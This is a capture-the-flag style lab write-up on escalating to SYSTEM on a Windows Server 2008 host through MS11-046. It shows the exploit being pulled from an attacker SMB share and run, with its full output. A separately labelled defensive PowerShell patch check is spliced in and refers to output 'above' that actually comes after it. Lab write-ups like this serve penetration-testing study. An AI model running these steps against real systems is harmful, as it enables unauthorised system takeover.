MS11-046
The target system is an extremely outdated Microsoft Windows Server 2008 Standard host, which is vulnerable to many exploits, including MS11-046 (CVE-2011-1249), a local privilege escalation in the Ancillary Function Driver (afd.sys).
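Added example, not part of the original write-up: a defender-side PowerShell check for whether a Windows host is still missing the MS11-046 fix. It assumes KB2503665 (Microsoft's update identifier for this bulletin; the number is not on the page) and the standard afd.sys driver path; the function name Test-MS11046Patch is mine. It uses Get-WmiObject and Get-HotFix so it also runs on the PowerShell 2.0 found on Server 2008 era hosts.

```powershell
# Added example (not from the original write-up): check a local Windows host for
# the MS11-046 (CVE-2011-1249) fix. Assumptions: the fix is installed as
# KB2503665 (Microsoft's bulletin identifier, not taken from the page) and the
# patched component is %SystemRoot%\System32\drivers\afd.sys.
function Test-MS11046Patch {
    # OS caption and bitness, so the report shows the same facts the exploit
    # output above fingerprinted (Windows Server 2008, 32-bit).
    $os = Get-WmiObject -Class Win32_OperatingSystem

    # Win32_QuickFixEngineering lists individually installed updates; the
    # MS11-046 update appears there as KB2503665 when it has been applied.
    $hotfix = Get-HotFix -Id KB2503665 -ErrorAction SilentlyContinue

    # Record the afd.sys file version so it can be compared against the file
    # table in Microsoft's bulletin if the QFE listing is inconclusive.
    $afdPath = Join-Path $env:SystemRoot 'System32\drivers\afd.sys'
    if (Test-Path $afdPath) {
        $afdVersion = (Get-Item $afdPath).VersionInfo.FileVersion
    } else {
        $afdVersion = 'not found'
    }

    if ($hotfix) {
        $assessment = 'KB2503665 present: MS11-046 fix installed'
    } else {
        $assessment = 'KB2503665 missing: host exposed to CVE-2011-1249, patch or isolate'
    }

    # New-Object PSObject keeps this PowerShell 2.0 compatible.
    New-Object PSObject -Property @{
        ComputerName  = $env:COMPUTERNAME
        OSCaption     = $os.Caption
        Architecture  = $os.OSArchitecture
        KB2503665     = [bool]$hotfix
        AfdSysVersion = $afdVersion
        Assessment    = $assessment
    }
}

# Usage: run in an elevated PowerShell session on the host being audited.
Test-MS11046Patch | Format-List
```

The QFE listing is the quick signal, but a missing KB entry is not proof on its own: a later update that supersedes the original package can carry the same afd.sys fix, so the reported AfdSysVersion is what to compare against the bulletin's file table before closing the finding. On a host this old the durable fix is decommissioning rather than patching, since Windows Server 2008 no longer receives security updates.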
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ cp /home/kali/Tools/windows-kernel-exploits/MS11-046/ms11-046.exe .
C:\> mkdir tmp && cd tmp
C:\tmp> copy \\192.168.45.245\smb\MS11-046.exe .
1 file(s) copied.
Delivery complete over SMB
C:\tmp> MS11-046.exe
[*] MS11-046 (CVE-2011-1249) x86 exploit
[*] by Tomislav Paskalev
[*] Identifying OS
[+] 32-bit
[+] Windows Server 2008
[*] Locating required OS components
[+] ntkrnlpa.exe
[*] Address: 0x8163c000
[*] Offset: 0x00b40000
[+] HalDispatchTable
[*] Offset: 0x00c38418
[+] NtQueryIntervalProfile
[*] Address: 0x76ef8ac8
[+] ZwDeviceIoControlFile
[*] Address: 0x76ef8438
[*] Setting up exploitation prerequisite
[*] Initialising Winsock DLL
[+] Done
[*] Creating socket
[+] Done
[*] Connecting to closed port
[+] Done
[*] Creating token stealing shellcode
[*] Shellcode assembled
[*] Allocating memory
[+] Address: 0x02070000
[*] Shellcode copied
[*] Exploiting vulnerability
[*] Sending AFD socket connect request
[+] Done
[*] Elevating privileges to SYSTEM
[+] Done
[*] Spawning shell
c:\Windows\System32> whoami
nt authority\system
c:\Windows\System32> hostname
LIVDA
c:\Windows\System32> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2d12:cfc9:2a58:43c4%12
IPv4 Address. . . . . . . . . . . : 192.168.203.46
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.203.254
Tunnel adapter Local Area Connection*:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
System Level Compromise